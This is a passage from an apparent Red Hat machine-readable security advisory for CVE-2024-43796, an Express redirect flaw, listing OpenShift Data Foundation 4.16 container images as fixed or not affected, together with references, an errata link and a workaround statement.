"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", 